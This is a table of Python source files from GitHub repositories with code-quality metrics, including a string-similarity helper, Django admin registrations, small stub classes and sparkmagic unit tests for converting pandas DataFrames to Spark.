hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
91f0d9c124a591cedf8b9efdf61c18c07648cd7f | 400 | py | Python | linguistics/similarity/jaro_winkler.py | idin/mercurius | 48a4ed7843fb5d1946ef8051f23da7b32ab52ca3 | [
"MIT"
] | 7 | 2019-02-24T16:56:46.000Z | 2022-01-30T03:26:49.000Z | linguistics/similarity/jaro_winkler.py | idin/mercurius | 48a4ed7843fb5d1946ef8051f23da7b32ab52ca3 | [
"MIT"
] | 1 | 2020-07-14T21:00:57.000Z | 2021-02-25T07:12:11.000Z | linguistics/similarity/jaro_winkler.py | idin/linguistics | ab9568d81b225928beab353174fd97ccb0fe369c | [
"MIT"
] | null | null | null | from jellyfish import jaro_winkler as _get_jaro_winkler_similarity
def get_jaro_winkler_similarity(s1, s2, case_sensitive=True):
    if not case_sensitive:
        s1 = s1.lower()
        s2 = s2.lower()
    return _get_jaro_winkler_similarity(s1, s2)

def get_jaro_winkler_distance(s1, s2, case_sensitive=True):
    return max(len(s1), len(s2)) * (1 - get_jaro_winkler_similarity(s1, s2, case_sensitive=case_sensitive))
| 28.571429 | 100 | 0.7925 | 64 | 400 | 4.59375 | 0.34375 | 0.22449 | 0.238095 | 0.326531 | 0.459184 | 0.37415 | 0.278912 | 0.278912 | 0 | 0 | 0 | 0.042017 | 0.1075 | 400 | 13 | 101 | 30.769231 | 0.781513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.125 | 0.625 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
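The case-insensitive wrapper pattern in the row above can be sketched without the third-party `jellyfish` dependency by plugging in a stand-in similarity function; `difflib.SequenceMatcher` is used here purely for illustration and does not compute Jaro-Winkler scores.

```python
from difflib import SequenceMatcher


def _similarity(s1, s2):
    # Stand-in for jellyfish.jaro_winkler; any [0, 1] similarity works here.
    return SequenceMatcher(None, s1, s2).ratio()


def get_similarity(s1, s2, case_sensitive=True):
    # Lowercase both inputs first when a case-insensitive comparison is wanted.
    if not case_sensitive:
        s1 = s1.lower()
        s2 = s2.lower()
    return _similarity(s1, s2)


def get_distance(s1, s2, case_sensitive=True):
    # Scale (1 - similarity) by the longer string, as in the row above.
    return max(len(s1), len(s2)) * (1 - get_similarity(s1, s2, case_sensitive=case_sensitive))
```

Identical strings give distance 0, and fully dissimilar strings give a distance equal to the longer length.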
6207a992a3b1cfd015e086f96af31eef7c66f571 | 169 | py | Python | pgnumbra/AccProvider.py | The-Real-Ketchum-Dev/PGNumbra | bc37703abdca75691024c71590d139d6bd471b3b | [
"Apache-2.0"
] | 4 | 2018-01-18T18:27:29.000Z | 2018-03-20T22:49:23.000Z | pgnumbra/AccProvider.py | The-Real-Ketchum-Dev/PGNumbra | bc37703abdca75691024c71590d139d6bd471b3b | [
"Apache-2.0"
] | 1 | 2018-01-21T23:22:33.000Z | 2018-01-21T23:22:33.000Z | pgnumbra/AccProvider.py | SenorKarlos/PGNumbra | bc37703abdca75691024c71590d139d6bd471b3b | [
"Apache-2.0"
] | 11 | 2018-01-19T06:41:48.000Z | 2018-03-20T19:40:39.000Z | class AccProvider(object):
    def get_num_accounts(self):
        raise Exception("Abstract method!")

    def next(self):
        raise Exception("Abstract method!")
| 21.125 | 43 | 0.662722 | 19 | 169 | 5.789474 | 0.684211 | 0.163636 | 0.327273 | 0.472727 | 0.581818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224852 | 169 | 7 | 44 | 24.142857 | 0.839695 | 0 | 0 | 0.4 | 0 | 0 | 0.189349 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
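The `raise Exception("Abstract method!")` idiom in the row above fails only when a missing method is actually called. The stdlib `abc` module expresses the same contract but fails earlier, at instantiation time; the `SingleAccountProvider` subclass below is a hypothetical example, not part of the original file.

```python
from abc import ABC, abstractmethod


class AccProvider(ABC):
    # Subclasses must implement both methods before they can be instantiated.
    @abstractmethod
    def get_num_accounts(self):
        ...

    @abstractmethod
    def next(self):
        ...


class SingleAccountProvider(AccProvider):
    # Hypothetical concrete provider that always hands out one fixed account.
    def __init__(self, account):
        self._account = account

    def get_num_accounts(self):
        return 1

    def next(self):
        return self._account
```

Instantiating `AccProvider()` directly raises `TypeError`, while the concrete subclass works normally.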
620cf3092db9df4f7dff2acc8e4d0546b64a3762 | 247 | py | Python | feedsearch_crawler/feed_spider/__init__.py | DBeath/feedsearch-crawler | 91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9 | [
"MIT"
] | 20 | 2019-11-02T18:46:11.000Z | 2022-03-18T16:22:32.000Z | feedsearch_crawler/feed_spider/__init__.py | DBeath/feedsearch-crawler | 91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9 | [
"MIT"
] | 8 | 2019-11-02T08:26:17.000Z | 2021-05-07T15:11:17.000Z | feedsearch_crawler/feed_spider/__init__.py | DBeath/feedsearch-crawler | 91258ecf6c7c25808ac5d4b5e1c5a7b96981bbe9 | [
"MIT"
] | 5 | 2020-06-18T15:44:48.000Z | 2022-02-19T14:21:47.000Z | from feedsearch_crawler.feed_spider.feed_info import FeedInfo
from feedsearch_crawler.feed_spider.site_meta import SiteMeta
from feedsearch_crawler.feed_spider.spider import FeedsearchSpider
__all__ = ["FeedsearchSpider", "FeedInfo", "SiteMeta"]
| 41.166667 | 66 | 0.8583 | 30 | 247 | 6.666667 | 0.433333 | 0.21 | 0.315 | 0.375 | 0.465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072874 | 247 | 5 | 67 | 49.4 | 0.873362 | 0 | 0 | 0 | 0 | 0 | 0.129555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
622429033918f53f10056f28876e3e0361e2c207 | 45 | py | Python | pentagon/migration/migrations/__init__.py | djd4352/pentagon | c5fd4dc3caf610fada378db6a4ab94beaf3a9c47 | [
"Apache-2.0"
] | 192 | 2017-05-22T21:36:19.000Z | 2019-04-12T06:51:11.000Z | pentagon/migration/migrations/__init__.py | djd4352/pentagon | c5fd4dc3caf610fada378db6a4ab94beaf3a9c47 | [
"Apache-2.0"
] | 132 | 2017-05-22T19:26:26.000Z | 2019-03-27T21:06:46.000Z | pentagon/migration/migrations/__init__.py | djd4352/pentagon | c5fd4dc3caf610fada378db6a4ab94beaf3a9c47 | [
"Apache-2.0"
] | 29 | 2017-05-22T19:21:31.000Z | 2019-03-27T19:55:35.000Z |
from pentagon.migration.migrations import *
| 15 | 43 | 0.822222 | 5 | 45 | 7.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 45 | 2 | 44 | 22.5 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
654dd2f9e8dd4f6fcabd926b1ce4f0c271cab311 | 159 | py | Python | blog/admin.py | leejooy96/django-simple-blog-example | d8977768e710564532d96b743f4d07539162e356 | [
"MIT"
] | 1 | 2019-11-28T05:02:59.000Z | 2019-11-28T05:02:59.000Z | blog/admin.py | leejooy96/django-simple-blog-example | d8977768e710564532d96b743f4d07539162e356 | [
"MIT"
] | 4 | 2021-03-18T21:52:07.000Z | 2021-06-10T17:56:29.000Z | blog/admin.py | leejooy96/django-simple-blog | d8977768e710564532d96b743f4d07539162e356 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Post, Comment, Config
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Config)
| 22.714286 | 41 | 0.811321 | 23 | 159 | 5.608696 | 0.478261 | 0.209302 | 0.395349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08805 | 159 | 6 | 42 | 26.5 | 0.889655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
65568ac32bad7433f7f7f0192e0464de2632f484 | 9 | py | Python | carla_utils/utils/npc_bind.py | IamWangYunKai/DG-TrajGen | 0a8aab7e1c05111a5afe43d53801c55942e9ff56 | [
"MIT"
] | 31 | 2021-09-15T00:43:43.000Z | 2022-03-27T22:57:21.000Z | carla_utils/utils/npc_bind.py | zhangdongkun98/carla-utils | a370db53589841c8cffe95c8df43dfc036176431 | [
"MIT"
] | 1 | 2021-12-09T03:08:13.000Z | 2021-12-15T07:08:31.000Z | carla_utils/utils/npc_bind.py | zhangdongkun98/carla-utils | a370db53589841c8cffe95c8df43dfc036176431 | [
"MIT"
] | 2 | 2021-11-26T05:45:18.000Z | 2022-01-19T12:46:41.000Z |
# TODO | 2.25 | 6 | 0.444444 | 1 | 9 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 9 | 4 | 6 | 2.25 | 0.8 | 0.444444 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0.25 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
659d2d0c6500a4aec2d021f38440310a02fb5a22 | 87 | py | Python | gateway/can/message.py | aceofwings/Cantactular | a6eb8d7128fd1388d3e75c1a8415123d1d5930e1 | [
"MIT"
] | 3 | 2017-01-26T01:37:42.000Z | 2018-07-22T02:42:52.000Z | gateway/can/message.py | aceofwings/Cantactular | a6eb8d7128fd1388d3e75c1a8415123d1d5930e1 | [
"MIT"
] | 1 | 2017-07-07T18:02:20.000Z | 2017-07-07T18:02:20.000Z | gateway/can/message.py | aceofwings/Evt-Gateway | a6eb8d7128fd1388d3e75c1a8415123d1d5930e1 | [
"MIT"
] | null | null | null |
class Message(object):
    def __init__(self):
        pass

    def toBytes(self):
        pass
| 9.666667 | 22 | 0.494253 | 9 | 87 | 4.777778 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.402299 | 87 | 8 | 23 | 10.875 | 0.826923 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0.4 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
65ee4321dbbdae76b52f3688f7c3760d351e91ff | 41 | py | Python | tcxparser/__init__.py | davidpch/python-tcxparser | 0b3d2bd4993b733d95b9bc2dd7368c6d462f905c | [
"BSD-2-Clause"
] | 73 | 2015-01-12T15:11:13.000Z | 2021-12-30T13:44:16.000Z | tcxparser/__init__.py | davidpch/python-tcxparser | 0b3d2bd4993b733d95b9bc2dd7368c6d462f905c | [
"BSD-2-Clause"
] | 54 | 2015-12-31T02:05:50.000Z | 2022-02-22T04:45:15.000Z | tcxparser/__init__.py | davidpch/python-tcxparser | 0b3d2bd4993b733d95b9bc2dd7368c6d462f905c | [
"BSD-2-Clause"
] | 56 | 2015-02-14T21:12:21.000Z | 2022-01-18T08:00:12.000Z | from .tcxparser import TCXParser # noqa
| 20.5 | 40 | 0.780488 | 5 | 41 | 6.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170732 | 41 | 1 | 41 | 41 | 0.941176 | 0.097561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
02e28250f1a1bb8c38fcdaacd14c9037c089d293 | 31 | py | Python | sakdas_v052021/sakdas/__init__.py | sakdaloe/sakdas_dm | 309551745976521db0b8fc9379b0675093e11b5d | [
"CC0-1.0"
] | 1 | 2021-08-01T04:08:48.000Z | 2021-08-01T04:08:48.000Z | sakdas_v052021/sakdas/__init__.py | sakdaloe/sakdas_dm | 309551745976521db0b8fc9379b0675093e11b5d | [
"CC0-1.0"
] | null | null | null | sakdas_v052021/sakdas/__init__.py | sakdaloe/sakdas_dm | 309551745976521db0b8fc9379b0675093e11b5d | [
"CC0-1.0"
] | null | null | null | from sakdas.Sakdas import Sakda | 31 | 31 | 0.870968 | 5 | 31 | 5.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 31 | 1 | 31 | 31 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f303e369b7894e7c8bc8cb9025061843df8387e3 | 6,674 | py | Python | sparkmagic/sparkmagic/tests/test_sendpandasdftosparkcommand.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | [
"RSA-MD"
] | 1,141 | 2015-09-21T20:52:00.000Z | 2022-03-31T14:15:51.000Z | sparkmagic/sparkmagic/tests/test_sendpandasdftosparkcommand.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | [
"RSA-MD"
] | 605 | 2015-09-23T23:27:43.000Z | 2022-03-16T07:46:52.000Z | sparkmagic/sparkmagic/tests/test_sendpandasdftosparkcommand.py | sciserver/sparkmagic | ac0852cbe88a41faa368cf1e1c89045a2de973bf | [
"RSA-MD"
] | 442 | 2015-09-23T21:31:28.000Z | 2022-03-13T15:19:57.000Z | # coding=utf-8
import pandas as pd
from mock import MagicMock
from sparkmagic.livyclientlib.exceptions import BadUserDataException
from nose.tools import assert_raises, assert_equals
from sparkmagic.livyclientlib.command import Command
import sparkmagic.utils.constants as constants
from sparkmagic.livyclientlib.sendpandasdftosparkcommand import SendPandasDfToSparkCommand
def test_send_to_scala():
    input_variable_name = 'input'
    input_variable_value = pd.DataFrame({'A': [1], 'B': [2]})
    output_variable_name = 'output'
    maxrows = 1
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, maxrows)
    sparkcommand._scala_command = MagicMock(return_value=MagicMock())
    sparkcommand.to_command(constants.SESSION_KIND_SPARK, input_variable_name, input_variable_value, output_variable_name)
    sparkcommand._scala_command.assert_called_with(input_variable_name, input_variable_value, output_variable_name)

def test_send_to_r():
    input_variable_name = 'input'
    input_variable_value = pd.DataFrame({'A': [1], 'B': [2]})
    output_variable_name = 'output'
    maxrows = 1
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, maxrows)
    sparkcommand._r_command = MagicMock(return_value=MagicMock())
    sparkcommand.to_command(constants.SESSION_KIND_SPARKR, input_variable_name, input_variable_value, output_variable_name)
    sparkcommand._r_command.assert_called_with(input_variable_name, input_variable_value, output_variable_name)

def test_send_to_python():
    input_variable_name = 'input'
    input_variable_value = pd.DataFrame({'A': [1], 'B': [2]})
    output_variable_name = 'output'
    maxrows = 1
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, maxrows)
    sparkcommand._pyspark_command = MagicMock(return_value=MagicMock())
    sparkcommand.to_command(constants.SESSION_KIND_PYSPARK, input_variable_name, input_variable_value, output_variable_name)
    sparkcommand._pyspark_command.assert_called_with(input_variable_name, input_variable_value, output_variable_name)

def test_should_create_a_valid_scala_expression():
    input_variable_name = "input"
    input_variable_value = pd.DataFrame({'A': [1], 'B': [2]})
    output_variable_name = "output"
    pandas_df_jsonized = u'''[{"A":1,"B":2}]'''
    expected_scala_code = u'''
val rdd_json_array = spark.sparkContext.makeRDD("""{}""" :: Nil)
val {} = spark.read.json(rdd_json_array)'''.format(pandas_df_jsonized, output_variable_name)
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
    assert_equals(sparkcommand._scala_command(input_variable_name, input_variable_value, output_variable_name),
                  Command(expected_scala_code))

def test_should_create_a_valid_r_expression():
    input_variable_name = "input"
    input_variable_value = pd.DataFrame({'A': [1], 'B': [2]})
    output_variable_name = "output"
    pandas_df_jsonized = u'''[{"A":1,"B":2}]'''
    expected_r_code = u'''
fileConn<-file("temporary_pandas_df_sparkmagics.txt")
writeLines('{}', fileConn)
close(fileConn)
{} <- read.json("temporary_pandas_df_sparkmagics.txt")
{}.persist()
file.remove("temporary_pandas_df_sparkmagics.txt")'''.format(pandas_df_jsonized, output_variable_name, output_variable_name)
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
    assert_equals(sparkcommand._r_command(input_variable_name, input_variable_value, output_variable_name),
                  Command(expected_r_code))

def test_should_create_a_valid_python3_expression():
    input_variable_name = "input"
    input_variable_value = pd.DataFrame({'A': [1], 'B': [2]})
    output_variable_name = "output"
    pandas_df_jsonized = u'''[{"A":1,"B":2}]'''
    expected_python3_code = SendPandasDfToSparkCommand._python_decode
    expected_python3_code += u'''
json_array = json_loads_byteified('{}')
rdd_json_array = spark.sparkContext.parallelize(json_array)
{} = spark.read.json(rdd_json_array)'''.format(pandas_df_jsonized, output_variable_name)
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
    assert_equals(sparkcommand._pyspark_command(input_variable_name, input_variable_value, output_variable_name),
                  Command(expected_python3_code))

def test_should_create_a_valid_python2_expression():
    input_variable_name = "input"
    input_variable_value = pd.DataFrame({'A': [1], 'B': [2]})
    output_variable_name = "output"
    pandas_df_jsonized = u'''[{"A":1,"B":2}]'''
    expected_python2_code = SendPandasDfToSparkCommand._python_decode
    expected_python2_code += u'''
json_array = json_loads_byteified('{}')
rdd_json_array = spark.sparkContext.parallelize(json_array)
{} = spark.read.json(rdd_json_array)'''.format(pandas_df_jsonized, output_variable_name)
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
    assert_equals(sparkcommand._pyspark_command(input_variable_name, input_variable_value, output_variable_name),
                  Command(expected_python2_code))

def test_should_properly_limit_pandas_dataframe():
    input_variable_name = "input"
    max_rows = 1
    input_variable_value = pd.DataFrame({'A': [0, 1, 2, 3, 4], 'B': [5, 6, 7, 8, 9]})
    output_variable_name = "output"
    pandas_df_jsonized = u'''[{"A":0,"B":5}]'''  # notice we expect json to have dropped all but one row
    expected_scala_code = u'''
val rdd_json_array = spark.sparkContext.makeRDD("""{}""" :: Nil)
val {} = spark.read.json(rdd_json_array)'''.format(pandas_df_jsonized, output_variable_name)
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, max_rows)
    assert_equals(sparkcommand._scala_command(input_variable_name, input_variable_value, output_variable_name),
                  Command(expected_scala_code))

def test_should_raise_when_input_is_not_pandas_df():
    input_variable_name = "input"
    input_variable_value = "not a pandas dataframe"
    output_variable_name = "output"
    sparkcommand = SendPandasDfToSparkCommand(input_variable_name, input_variable_value, output_variable_name, 1)
    assert_raises(BadUserDataException, sparkcommand.to_command, "spark", input_variable_name, input_variable_value, output_variable_name)
| 52.140625 | 138 | 0.761163 | 819 | 6,674 | 5.750916 | 0.130647 | 0.168153 | 0.13758 | 0.140127 | 0.833121 | 0.792144 | 0.781953 | 0.750106 | 0.750106 | 0.741189 | 0 | 0.009011 | 0.135301 | 6,674 | 127 | 139 | 52.551181 | 0.807139 | 0.009739 | 0 | 0.557692 | 0 | 0 | 0.158492 | 0.072813 | 0 | 0 | 0 | 0 | 0.096154 | 1 | 0.086538 | false | 0 | 0.067308 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
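The tests in the row above all follow the same mock-and-assert pattern: replace an internal method with a `MagicMock`, drive the public entry point, then check the recorded call arguments. A minimal, self-contained sketch of that pattern (the `Greeter` class is made up for illustration):

```python
from unittest.mock import MagicMock


class Greeter:
    def render(self, name):
        return "hi " + name

    def greet(self, name):
        # Public entry point that delegates to render().
        return self.render(name)


g = Greeter()
# Swap the internal method for a mock so the test controls its return value.
g.render = MagicMock(return_value="mocked")
result = g.greet("world")

# The mock records how it was called, so the test can assert on the arguments.
g.render.assert_called_with("world")
```

`assert_called_with` raises `AssertionError` if the recorded arguments differ, which is exactly how the `_scala_command` / `_r_command` / `_pyspark_command` assertions above work.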
f30a7382eac03348c3a2b2155f24be38237a910b | 152 | py | Python | itdagene/app/feedback/admin.py | itdagene-ntnu/itdagene | b972cd3d803debccebbc33641397a39834b8d69a | [
"MIT"
] | 9 | 2018-10-17T20:58:09.000Z | 2021-12-16T16:16:45.000Z | itdagene/app/feedback/admin.py | itdagene-ntnu/itdagene | b972cd3d803debccebbc33641397a39834b8d69a | [
"MIT"
] | 177 | 2018-10-27T18:15:56.000Z | 2022-03-28T04:29:06.000Z | itdagene/app/feedback/admin.py | itdagene-ntnu/itdagene | b972cd3d803debccebbc33641397a39834b8d69a | [
"MIT"
] | null | null | null | from django.contrib import admin
from itdagene.app.feedback.models import Evaluation, Issue
admin.site.register(Issue)
admin.site.register(Evaluation)
| 25.333333 | 58 | 0.835526 | 21 | 152 | 6.047619 | 0.619048 | 0.15748 | 0.220472 | 0.346457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 152 | 5 | 59 | 30.4 | 0.907143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b843c84d0ad8af31b9637be180ccf45663393069 | 2,386 | py | Python | crawler/manual/news/missed_journals/google_links.py | bromjiri/Presto | e5790f60d0935bb1182f676db414b0724ba35c1b | [
"MIT"
